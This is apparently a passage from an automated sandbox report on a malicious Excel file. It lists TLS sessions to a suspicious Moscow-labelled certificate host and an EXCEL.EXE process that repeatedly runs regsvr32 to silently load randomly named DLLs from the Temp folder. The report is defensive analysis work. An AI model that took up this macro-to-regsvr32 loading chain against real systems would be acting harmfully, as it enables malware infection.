                                                                                                Jan 21, 2021 16:05:39.785105944 CET194.225.58.214443192.168.2.2249302CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:41.637602091 CET194.225.58.214443192.168.2.2249307CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:43.339689970 CET194.225.58.214443192.168.2.2249314CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:44.681730986 CET194.225.58.214443192.168.2.2249318CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:45.476336956 CET194.225.58.214443192.168.2.2249319CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:45.738255978 CET194.225.58.214443192.168.2.2249320CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87

                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                Analysis Process: EXCEL.EXE PID: 2432 Parent PID: 584

                                                                                                General

                                                                                                Start time:16:02:43
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                Imagebase:0x13fa20000
                                                                                                File size:27641504 bytes
                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Analysis Process: regsvr32.exe PID: 2440 Parent PID: 2432

                                                                                                General

                                                                                                Start time:16:02:49
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
                                                                                                Imagebase:0xffe50000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Analysis Process: regsvr32.exe PID: 2328 Parent PID: 2432

                                                                                                General

                                                                                                Start time:16:02:55
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Analysis Process: regsvr32.exe PID: 1980 Parent PID: 2432

                                                                                                General

                                                                                                Start time:16:02:55
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\uveoybvk.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Analysis Process: regsvr32.exe PID: 2692 Parent PID: 2328

                                                                                                General

                                                                                                Start time:16:02:56
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\kxwni.dll
                                                                                                Imagebase:0x9e0000
                                                                                                File size:14848 bytes
                                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                Analysis Process: regsvr32.exe PID: 2780 Parent PID: 2432

                                                                                                General

                                                                                                Start time:16:02:56
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Analysis Process: regsvr32.exe PID: 2920 Parent PID: 2432

                                                                                                General

                                                                                                Start time:16:03:04
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Analysis Process: regsvr32.exe PID: 2464 Parent PID: 2920

                                                                                                General

                                                                                                Start time:16:03:05
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
                                                                                                Imagebase:0x9e0000
                                                                                                File size:14848 bytes
                                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                Analysis Process: regsvr32.exe PID: 3036 Parent PID: 2432

                                                                                                General

                                                                                                Start time:16:03:16
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Analysis Process: regsvr32.exe PID: 2964 Parent PID: 3036

                                                                                                General

                                                                                                Start time:16:03:20
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
                                                                                                Imagebase:0x9e0000
                                                                                                File size:14848 bytes
                                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                Analysis Process: regsvr32.exe PID: 2452 Parent PID: 2432

                                                                                                General

                                                                                                Start time:16:03:57
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jxacpz.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Analysis Process: regsvr32.exe PID: 2496 Parent PID: 2432

                                                                                                General

                                                                                                Start time:16:03:57
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Analysis Process: regsvr32.exe PID: 1236 Parent PID: 2432

                                                                                                General

                                                                                                Start time:16:04:03
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Analysis Process: regsvr32.exe PID: 912 Parent PID: 1236

                                                                                                General

                                                                                                Start time:16:04:04
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
                                                                                                Imagebase:0x9e0000
                                                                                                File size:14848 bytes
                                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                Analysis Process: regsvr32.exe PID: 2852 Parent PID: 2432

                                                                                                General

                                                                                                Start time:16:04:05
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Analysis Process: regsvr32.exe PID: 2828 Parent PID: 2852

                                                                                                General

                                                                                                Start time:16:04:05
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
                                                                                                Imagebase:0x9e0000
                                                                                                File size:14848 bytes
                                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Disassembly

                                                                                                Code Analysis

                                                                                                Reset < >